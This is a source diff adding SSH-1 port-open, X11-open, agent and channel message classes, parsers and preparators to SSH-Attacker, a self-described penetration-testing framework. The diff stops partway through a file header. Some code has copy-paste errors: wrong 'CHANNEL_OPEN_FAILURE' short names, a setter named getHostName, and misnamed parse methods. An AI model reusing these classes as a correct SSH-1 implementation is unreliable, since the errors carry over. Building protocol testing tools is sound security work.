file mode 100644 index 000000000..7b401ce1e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortOpenMessageSSH1.java @@ -0,0 +1,115 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.PortForwardRequestMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.PortOpenMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.PortForwardRequestMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.PortOpenMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.PortForwardRequestMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.PortOpenMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.PortForwardRequestMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.PortOpenMessageSSHV1Serializier; + +import java.io.InputStream; + +public class PortOpenMessageSSH1 extends SshMessage { + + private ModifiableInteger localChannel; + private ModifiableString hostName; + private ModifiableInteger port; + private ModifiableString originatorString; + + public ModifiableString getOriginatorString() { + return originatorString; + } + + public void setOriginatorString(ModifiableString originatorString) { + this.originatorString = originatorString; + } + + public void setOriginatorString(String originatorString) { + this.originatorString = ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); + } + + public ModifiableString getHostName() { + return hostName; + } + + public ModifiableInteger getPort() { + return port; + } + + public void setPort(ModifiableInteger port) { + this.port = port; + } + + public void setPort(int port) { + this.port = ModifiableVariableFactory.safelySetValue(this.port,port); + } + + public void setHostName(ModifiableString hostName) { + this.hostName = hostName; + } + + public void setHostName(String hostName) { + this.hostName = ModifiableVariableFactory.safelySetValue(this.hostName, hostName); + } + + + public void getHostName(String hostName) { + this.hostName = ModifiableVariableFactory.safelySetValue(this.hostName, hostName); + } + + + public ModifiableInteger getLocalChannel() { + return localChannel; + } + + public void setLocalChannel(ModifiableInteger localChannel) { + this.localChannel = localChannel; + } + + public void setLocalChannel(int localChannel) { + this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + } + + @Override + public PortOpenMessageSSHV1Handler getHandler(SshContext context) { + return new PortOpenMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new PortOpenMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new PortOpenMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new PortOpenMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java new file mode 100644 index 000000000..af60f04e1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java @@ -0,0 +1,84 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.X11OpenMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelDataMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.X11OpenMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.X11OpenMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelDataMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.X11OpenMessageSSHV1Serializier; + +import java.io.InputStream; + +public class X11OpenMessageSSH1 extends SshMessage { + + private ModifiableInteger localChannel; + private ModifiableString originatorString; + + public ModifiableString getOriginatorString() { + return originatorString; + } + + public void setOriginatorString(ModifiableString originatorString) { + this.originatorString = originatorString; + } + + public void setOriginatorString(String originatorString) { + this.originatorString = ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); + } + + + public ModifiableInteger getLocalChannel() { + return localChannel; + } + + public void setLocalChannel(ModifiableInteger localChannel) { + this.localChannel = localChannel; + } + + public void setLocalChannel(int remoteChannel) { + this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, remoteChannel); + } + + @Override + public X11OpenMessageSSHV1Handler getHandler(SshContext context) { + return new X11OpenMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new X11OpenMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new X11OpenMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new X11OpenMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java new file mode 100644 index 000000000..ffff59e05 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class AgentOpenMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentOpenMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseLocalChannel(AgentOpenMessageSSH1 message) { + int exitStatus = parseIntField(4); + message.setLocalChannel(exitStatus); + } + + @Override + protected void parseMessageSpecificContents(AgentOpenMessageSSH1 message) { + parseLocalChannel(message); + } + + @Override + public void parse(AgentOpenMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java new file mode 100644 index 000000000..d7eb03562 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class AgentRequestForwardingMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentRequestForwardingMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(AgentRequestForwardingMessageSSH1 message) {} + + @Override + public void parse(AgentRequestForwardingMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java new file mode 100644 index 000000000..47cdf5904 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ChannelCloseConfirmationMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(ChannelCloseConfirmationMessageSSH1 message) { + int remoteChannel = parseIntField(4); + message.setRemoteChannel(remoteChannel); + } + + @Override + protected void parseMessageSpecificContents(ChannelCloseConfirmationMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(ChannelCloseConfirmationMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java new file mode 100644 index 000000000..ed8baf5d9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ChannelCloseMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(ChannelCloseMessageSSH1 message) { + int remoteChannel = parseIntField(4); + message.setRemoteChannel(remoteChannel); + } + + @Override + protected void parseMessageSpecificContents(ChannelCloseMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(ChannelCloseMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java new file mode 100644 index 000000000..36b9f45a0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java @@ -0,0 +1,42 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ChannelDataMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelDataMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(ChannelDataMessageSSH1 message) { + int remoteChannel = parseIntField(4); + int dataLenght = parseIntField(4); + String data = parseByteString(dataLenght); + message.setRemoteChannel(remoteChannel); + message.setData(data); + } + + @Override + protected void parseMessageSpecificContents(ChannelDataMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(ChannelDataMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java new file mode 100644 index 000000000..ae6cd3f34 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java @@ -0,0 +1,45 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class PortForwardRequestMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public PortForwardRequestMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(PortForwardRequestMessageSSH1 message) { + int remoteChannel = parseIntField(4); + int dataLenght = parseIntField(4); + String data = parseByteString(dataLenght); + int portToConnect = parseIntField(4); + message.setServerPort(remoteChannel); + message.setHostToConnect(data); + message.setPortToConnect(portToConnect); + } + + @Override + protected void parseMessageSpecificContents(PortForwardRequestMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(PortForwardRequestMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java new file mode 100644 index 000000000..e07b40785 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java @@ -0,0 +1,48 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class PortOpenMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public PortOpenMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(PortOpenMessageSSH1 message) { + int localChannel = parseIntField(4); + int hostnameLenght = parseIntField(4); + String hostname = parseByteString(hostnameLenght); + int originatorStringLenght = parseIntField(4); + String originatorString = parseByteString(originatorStringLenght); + int portToConnect = parseIntField(4); + message.setLocalChannel(localChannel); + message.setHostName(hostname); + message.setPort(portToConnect); + message.setOriginatorString(originatorString); + } + + @Override + protected void parseMessageSpecificContents(PortOpenMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(PortOpenMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java new file mode 100644 index 000000000..5a0d519f6 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java @@ -0,0 +1,43 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class X11OpenMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public X11OpenMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(X11OpenMessageSSH1 message) { + int remoteChannel = parseIntField(4); + int dataLenght = parseIntField(4); + String data = parseByteString(dataLenght); + message.setLocalChannel(remoteChannel); + message.setOriginatorString(data); + } + + @Override + protected void parseMessageSpecificContents(X11OpenMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(X11OpenMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java new file mode 100644 index 000000000..9f05dc930 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentOpenMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentOpenMessageSSHV1Preparator(Chooser chooser, AgentOpenMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_AGENT_OPEN); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getLocalChannel() == null) { + getObject().setLocalChannel(0); + } + LOGGER.debug(getObject().getLocalChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java new file mode 100644 index 000000000..b9a49f45c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentRequestForwardingMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentRequestForwardingMessageSSHV1Preparator(Chooser chooser, AgentRequestForwardingMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AGENT_REQUEST_FORWARDING); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java new file mode 100644 index 000000000..5e4de97cf --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseConfirmationMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseConfirmationMessageSSHV1Preparator(Chooser chooser, ChannelCloseConfirmationMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_CLOSE_CONFIRMATION); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getRemoteChannel() == null) { + getObject().setRemoteChannel(0); + } + LOGGER.debug(getObject().getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java new file mode 100644 index 000000000..5c59de5c1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseMessageSSHV1Preparator(Chooser chooser, ChannelCloseMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_CLOSE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getRemoteChannel() == null) { + getObject().setRemoteChannel(0); + } + LOGGER.debug(getObject().getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java new file mode 100644 index 000000000..525659727 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelDataMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelDataMessageSSHV1Preparator(Chooser chooser, ChannelDataMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_DATA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getRemoteChannel() == null) { + getObject().setRemoteChannel(0); + } + LOGGER.debug(getObject().getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java new file mode 100644 index 000000000..25fbe344c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java 